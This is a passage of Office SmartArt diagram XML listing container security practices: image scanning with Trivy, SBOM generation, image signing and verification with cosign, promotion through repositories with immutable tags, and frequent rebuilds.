    <dgm:cxn modelId="{491CC58A-C939-3A4D-937C-91A0ED0E6B3E}" type="presOf" srcId="{E5F1DA36-C859-452B-B33C-98D25C84313E}" destId="{7D6D0431-3EA8-5E42-A0E0-50F6392B7D4D}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{31F2DCA2-B5E0-1A4D-966D-EE6B0B6BE74D}" type="presOf" srcId="{AF040E11-678B-4AD0-B1EF-0400CB438FD5}" destId="{7D6D0431-3EA8-5E42-A0E0-50F6392B7D4D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D3AB3DAA-F5F2-1348-A488-5D054A112250}" type="presOf" srcId="{6581917F-E8EA-480E-932E-DAE99C7A9634}" destId="{69C91215-5240-494A-A232-537391B2A90E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8D29B9C5-B037-854E-A681-00A060A8E43B}" type="presOf" srcId="{AB7ECFD5-3F89-4449-BD29-3D7FE1DB44E5}" destId="{86B69887-D2B5-794B-A24E-0454AE2C4CF7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E4CB0EE3-DB49-0746-8359-9ED7969EDF17}" type="presOf" srcId="{179CFE87-1CDA-054A-9959-4AD1923B3252}" destId="{2F0FA6F6-5C54-284A-A17B-56A51AA6905C}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E9CCFAE8-BE2B-4B61-A50B-AC371A0930FA}" srcId="{C91D7D89-BECF-4858-B0DE-B4B1F18602A0}" destId="{F5C9B465-135D-40A1-B00C-8783162587EB}" srcOrd="0" destOrd="0" parTransId="{B5C6EC1D-4BED-43CB-8691-A4E95C5D2611}" sibTransId="{74BAB99E-B926-4A86-ACAD-189B264A5074}"/>
    <dgm:cxn modelId="{5370CAF8-5FBE-45D3-BC35-88FAB4F43B16}" srcId="{C91D7D89-BECF-4858-B0DE-B4B1F18602A0}" destId="{7AD4E799-12E0-4712-8013-4B14F1C06971}" srcOrd="3" destOrd="0" parTransId="{DD8B0340-6C52-4627-B7E9-2652BB835836}" sibTransId="{3964DC45-4D9C-43D6-86D1-6E0F4BEA685E}"/>
    <dgm:cxn modelId="{1BD33DFF-2D19-4250-AC1E-266447EB10A3}" srcId="{6581917F-E8EA-480E-932E-DAE99C7A9634}" destId="{45A8E3BB-0D7E-4149-AE40-F5756631052E}" srcOrd="1" destOrd="0" parTransId="{FF2B28C3-125C-45B5-80FF-CCDAD474E5CE}" sibTransId="{BC7883C5-8E14-4AD1-8DE4-E5F9444AE113}"/>
    <dgm:cxn modelId="{CC0FCBA1-8310-4F4D-95A5-822D1317BF27}" type="presParOf" srcId="{86B69887-D2B5-794B-A24E-0454AE2C4CF7}" destId="{69C91215-5240-494A-A232-537391B2A90E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FB0C7DAE-FD7E-8047-AAA6-1FD8ACDA4DA0}" type="presParOf" srcId="{86B69887-D2B5-794B-A24E-0454AE2C4CF7}" destId="{7D6D0431-3EA8-5E42-A0E0-50F6392B7D4D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{BA6D6F70-4426-7845-925E-D49BDE7A07FC}" type="presParOf" srcId="{86B69887-D2B5-794B-A24E-0454AE2C4CF7}" destId="{18EF3945-9971-B946-AA87-23CEA3855FD0}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8369D650-D6F8-A945-ABCA-206E02224C71}" type="presParOf" srcId="{86B69887-D2B5-794B-A24E-0454AE2C4CF7}" destId="{2F0FA6F6-5C54-284A-A17B-56A51AA690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22AA0-7E1C-4D3B-A5D4-08B6AD68DF4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1C26F-7BB9-48C6-8156-324557615AFB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0"/>
            <a:t>Scan images in pipeline</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E783EB69-7E99-49C3-B704-7DC6ECC960DD}" type="parTrans" cxnId="{0822FC6C-6DB4-4EEA-8C0E-0BDB5F1978DB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B5434760-57F9-48ED-AF53-AFE020295CF7}" type="sibTrans" cxnId="{0822FC6C-6DB4-4EEA-8C0E-0BDB5F1978DB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6AF80E36-C872-4942-B69B-4B9FCDD03D7E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>fail on CRITICAL/HIGH (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>trivy</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> image --exit-code 1 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>docker.io</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>myapp:latest</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{52D6D80C-0EFA-4407-9AF6-8065086662EB}" type="parTrans" cxnId="{4D4D589A-35FE-4FC9-BC7D-EE25D85F3508}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{688C6F3F-97D4-404D-A6F8-3C5039C017F8}" type="sibTrans" cxnId="{4D4D589A-35FE-4FC9-BC7D-EE25D85F3508}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{122F9603-EB51-40B1-90C8-89ABC61D1615}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Build SBOM &amp; store as artifact</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7C45DE0-DFD5-4A7E-B0E0-C9F5998419E3}" type="parTrans" cxnId="{F2D06EC2-6F24-43C5-B252-2F16F42FF1C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C643D13-63DC-4DEB-8D24-AEFB22317EB5}" type="sibTrans" cxnId="{F2D06EC2-6F24-43C5-B252-2F16F42FF1C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3BC56194-32CF-41E2-874F-5BD119D2ED5B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>track dependencies and license info</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4121BD83-5993-43DF-A85E-E66D0E1212BA}" type="parTrans" cxnId="{F6882467-F646-42E2-95CE-BE62585D4A25}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{94A2BCFC-A2BC-4854-B524-45F682E08DA7}" type="sibTrans" cxnId="{F6882467-F646-42E2-95CE-BE62585D4A25}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{445EB1D3-0E45-4E46-BE9E-C84F9C8838BF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Sign images</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7DBE506A-B3FC-4BD6-A345-B75296CE8993}" type="parTrans" cxnId="{2E039EA1-E933-48AA-B258-417624FC31CC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B1AE5D52-A515-466E-A3B1-96BF7CDFC998}" type="sibTrans" cxnId="{2E039EA1-E933-48AA-B258-417624FC31CC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3FA00FA1-419C-470C-AEFD-28BD4DBA701C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>verify on deploy (cosign verify docker.io/myapp:latest)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{97EB2DEB-FC08-4C71-AE04-DFD1B5678A22}" type="parTrans" cxnId="{AA5AD7BF-E8E8-4225-9DFA-60544E6E1083}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{172E038E-9946-400D-87CD-D464F663E451}" type="sibTrans" cxnId="{AA5AD7BF-E8E8-4225-9DFA-60544E6E1083}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2E79C6C5-7188-42E7-A67B-739EC16EE7AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Promote images through repos</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3B51159-E7BD-4862-B51F-E2E731E3B3A6}" type="parTrans" cxnId="{D228842B-D9D4-4B45-918D-05A0FC0BAF3F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53DDB3B7-64A5-404F-8E11-FB3A2E3010BE}" type="sibTrans" cxnId="{D228842B-D9D4-4B45-918D-05A0FC0BAF3F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{370B5DC9-1D57-44CF-8C37-E03A90AD5EB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>dev → staging → prod (immutable tags)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0703452F-A7BF-47DF-9351-42207BDAC9FE}" type="parTrans" cxnId="{9D2D7093-0D1B-4AAE-B3A6-72BE118A5278}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FDAF581D-2D82-4F37-9A84-B9F7B7976F80}" type="sibTrans" cxnId="{9D2D7093-0D1B-4AAE-B3A6-72BE118A5278}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{46F390D7-E66F-4B17-A9E1-00A4E797F5F1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Rebuild images frequently</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A69C432C-5F68-4404-9BC0-F09F2B25B57E}" type="parTrans" cxnId="{31764E07-E6B3-42EB-8FBB-D33352646297}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7106324C-D77F-4AD0-A21E-B9DDD586B22E}" type="sibTrans" cxnId="{31764E07-E6B3-42EB-8FBB-D33352646297}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C7827EC-431F-4490-BF05-7D68AC1F7706}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>pick up upstream security fixes</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AE6210CB-8E49-4D71-9732-CA6B4C7C3EB5}" type="parTrans" cxnId="{D2C0F54D-42DE-4787-9BD1-49D2A92A1ED0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2523051B-58FB-4ABE-BC57-11EEC296E07A}" type="sibTrans" cxnId="{D2C0F54D-42DE-4787-9BD1-49D2A92A1ED0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A333706A-65AE-4F46-9A94-8334B48DC444}" type="pres">
      <dgm:prSet presAssocID="{CD722AA0-7E1C-4D3B-A5D4-08B6AD68DF41}" presName="vert0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9C47170C-EC18-E94C-858D-76C9C82A2133}" type="pres">
      <dgm:prSet presAssocID="{10C1C26F-7BB9-48C6-8156-324557615AFB}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5D37EC8A-B58D-3447-B060-31A25B068081}" type="pres">
      <dgm:prSet presAssocID="{10C1C26F-7BB9-48C6-8156-324557615AFB}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{49F8F733-D4C0-F14C-950B-CB4AE49E3EE4}" type="pres">
      <dgm:prSet presAssocID="{10C1C26F-7BB9-48C6-8156-324557615AFB}" presName="tx1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CA649698-3BC4-7342-B72C-6BB83598B49A}" type="pres">
      <dgm:prSet presAssocID="{10C1C26F-7BB9-48C6-8156-324557615AFB}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AB2DA1C5-1276-A24D-8AC7-157937986D01}" type="pres">
      <dgm:prSet presAssocID="{6AF80E36-C872-4942-B69B-4B9FCDD03D7E}" presName="vertSpace2a" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E6B733CA-D7B0-8842-8D76-BBC84A375247}" type="pres">
      <dgm:prSet presAssocID="{6AF80E36-C872-4942-B69B-4B9FCDD03D7E}" presName="horz2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E64DA563-D12F-D24B-A1BD-8F03AB6E594D}" type="pres">
      <dgm:prSet presAssocID="{6AF80E36-C872-4942-B69B-4B9FCDD03D7E}" presName="horzSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6059813E-AEF3-6A45-8360-46859E12E897}" type="pres">
      <dgm:prSet presAssocID="{6AF80E36-C872-4942-B69B-4B9FCDD03D7E}" presName="tx2" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{631E5DCF-4D7C-0D46-9388-C4197251CCBF}" type="pres">
      <dgm:prSet presAssocID="{6AF80E36-C872-4942-B69B-4B9FCDD03D7E}" presName="vert2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DD05A6EF-035A-EE4E-AF1B-E5914F4DF942}" type="pres">
      <dgm:prSet presAssocID="{6AF80E36-C872-4942-B69B-4B9FCDD03D7E}" presName="thinLine2b" presStyleLbl="callout" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A0D2C685-1572-D24A-99CD-7116305489AF}" type="pres">
      <dgm:prSet presAssocID="{6AF80E36-C872-4942-B69B-4B9FCDD03D7E}" presName="vertSpace2b" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DDC580B2-8F04-C74F-97D2-A1F18532FF99}" type="pres">
      <dgm:prSet presAssocID="{122F9603-EB51-40B1-90C8-89ABC61D1615}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{344F28D0-9DB4-454C-BF25-AA9A7046ED29}" type="pres">
      <dgm:prSet presAssocID="{122F9603-EB51-40B1-90C8-89ABC61D1615}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{250F70CD-5942-EE4F-B41D-EFDB07A356F6}" type="pres">
      <dgm:prSet presAssocID="{122F9603-EB51-40B1-90C8-89ABC61D1615}" presName="tx1" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F4651DFE-8174-0244-9666-FAF539D1F42F}" type="pres">
      <dgm:prSet presAssocID="{122F9603-EB51-40B1-90C8-89ABC61D1615}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7F2224D4-F969-3E4D-B72B-816206097752}" type="pres">
      <dgm:prSet presAssocID="{3BC56194-32CF-41E2-874F-5BD119D2ED5B}" presName="vertSpace2a" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C5B9A74E-0F2E-344F-BAAD-3A7F96919952}" type="pres">
      <dgm:prSet presAssocID="{3BC56194-32CF-41E2-874F-5BD119D2ED5B}" presName="horz2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4ED10A33-4E31-5D4B-844C-5E2E69A064A8}" type="pres">
      <dgm:prSet presAssocID="{3BC56194-32CF-41E2-874F-5BD119D2ED5B}" presName="horzSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D5AB6AA6-4404-4443-826A-8387E3CAD5A7}" type="pres">
      <dgm:prSet presAssocID="{3BC56194-32CF-41E2-874F-5BD119D2ED5B}" presName="tx2" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{79F14568-F352-F14E-A55B-8CD07E937997}" type="pres">
      <dgm:prSet presAssocID="{3BC56194-32CF-41E2-874F-5BD119D2ED5B}" presName="vert2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B3AB0CA8-C791-9441-AFBF-4C55D2F987AB}" type="pres">
      <dgm:prSet presAssocID="{3BC56194-32CF-41E2-874F-5BD119D2ED5B}" presName="thinLine2b" presStyleLbl="callout" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{00773879-F3DF-5F4F-8CC3-ACCE7E78DA80}" type="pres">
      <dgm:prSet presAssocID="{3BC56194-32CF-41E2-874F-5BD119D2ED5B}" presName="vertSpace2b" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{78A6ADF1-E4D7-6143-BA5A-E092DBD81D0E}" type="pres">
      <dgm:prSet presAssocID="{445EB1D3-0E45-4E46-BE9E-C84F9C8838BF}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FFC10D3A-E52C-294B-960D-DF0A4ABCD60A}" type="pres">
      <dgm:prSet presAssocID="{445EB1D3-0E45-4E46-BE9E-C84F9C8838BF}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F1EAF90C-B460-5642-A2D7-CECFCBDDDEA9}" type="pres">
      <dgm:prSet presAssocID="{445EB1D3-0E45-4E46-BE9E-C84F9C8838BF}" presName="tx1" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F7E63325-862A-6948-9064-120F4F288BD1}" type="pres">
      <dgm:prSet presAssocID="{445EB1D3-0E45-4E46-BE9E-C84F9C8838BF}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{090B1180-4781-8149-88DC-6FB118E39E7A}" type="pres">
      <dgm:prSet presAssocID="{3FA00FA1-419C-470C-AEFD-28BD4DBA701C}" presName="vertSpace2a" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2F8E6A30-5DF9-D34E-BEF2-34F409B2998D}" type="pres">
      <dgm:prSet presAssocID="{3FA00FA1-419C-470C-AEFD-28BD4DBA701C}" presName="horz2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{824D660A-8023-E44B-A495-6D078E8EBDEF}" type="pres">
      <dgm:prSet presAssocID="{3FA00FA1-419C-470C-AEFD-28BD4DBA701C}" presName="horzSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EF774A23-D505-894F-BE91-DB0C7E89A7E7}" type="pres">
      <dgm:prSet presAssocID="{3FA00FA1-419C-470C-AEFD-28BD4DBA701C}" presName="tx2" presStyleLbl="revTx" presStyleIdx="5" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8AD61380-C8E9-7241-BDAF-BE7937385AB8}" type="pres">
      <dgm:prSet presAssocID="{3FA00FA1-419C-470C-AEFD-28BD4DBA701C}" presName="vert2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{626556BD-3B5E-6845-AD92-F23DB0A3201A}" type="pres">
      <dgm:prSet presAssocID="{3FA00FA1-419C-470C-AEFD-28BD4DBA701C}" presName="thinLine2b" presStyleLbl="callout" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FE5A8F67-B8FC-BF48-880E-F4C06A2B8618}" type="pres">
      <dgm:prSet presAssocID="{3FA00FA1-419C-470C-AEFD-28BD4DBA701C}" presName="vertSpace2b" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{528D6731-AE29-2240-B476-CEB1C58506F5}" type="pres">
      <dgm:prSet presAssocID="{2E79C6C5-7188-42E7-A67B-739EC16EE7AE}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E6D69B64-EEBF-D249-8914-D8A1FB0C5A67}" type="pres">
      <dgm:prSet presAssocID="{2E79C6C5-7188-42E7-A67B-739EC16EE7AE}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CEEF9AC1-8FAE-B842-8616-B7B984677B22}" type="pres">
      <dgm:prSet presAssocID="{2E79C6C5-7188-42E7-A67B-739EC16EE7AE}" presName="tx1" presStyleLbl="revTx" presStyleIdx="6" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3F557E8A-7EBB-FD41-8159-4A83FF964E19}" type="pres">
      <dgm:prSet presAssocID="{2E79C6C5-7188-42E7-A67B-739EC16EE7AE}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DD9C6B84-0B1C-A147-8F91-86C6E716B597}" type="pres">
      <dgm:prSet presAssocID="{370B5DC9-1D57-44CF-8C37-E03A90AD5EB9}" presName="vertSpace2a" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C88B33B1-C177-D245-B214-62E0D5018487}" type="pres">
      <dgm:prSet presAssocID="{370B5DC9-1D57-44CF-8C37-E03A90AD5EB9}" presName="horz2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{707C903D-2DFB-A24A-B28B-48C6849E5F9E}" type="pres">
      <dgm:prSet presAssocID="{370B5DC9-1D57-44CF-8C37-E03A90AD5EB9}" presName="horzSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AA133D33-0405-1349-BA3E-AFC446231ADF}" type="pres">
      <dgm:prSet presAssocID="{370B5DC9-1D57-44CF-8C37-E03A90AD5EB9}" presName="tx2" presStyleLbl="revTx" presStyleIdx="7" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4D8DBFB6-1624-0646-8A47-00D7A2D68FBA}" type="pres">
      <dgm:prSet presAssocID="{370B5DC9-1D57-44CF-8C37-E03A90AD5EB9}" presName="vert2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E3C9D48A-511F-5B45-80D2-160E0710251E}" type="pres">
      <dgm:prSet presAssocID="{370B5DC9-1D57-44CF-8C37-E03A90AD5EB9}" presName="thinLine2b" presStyleLbl="callout" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{35023DA0-FD66-CD42-A8E1-28E5A7B74EF5}" type="pres">
      <dgm:prSet presAssocID="{370B5DC9-1D57-44CF-8C37-E03A90AD5EB9}" presName="vertSpace2b" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
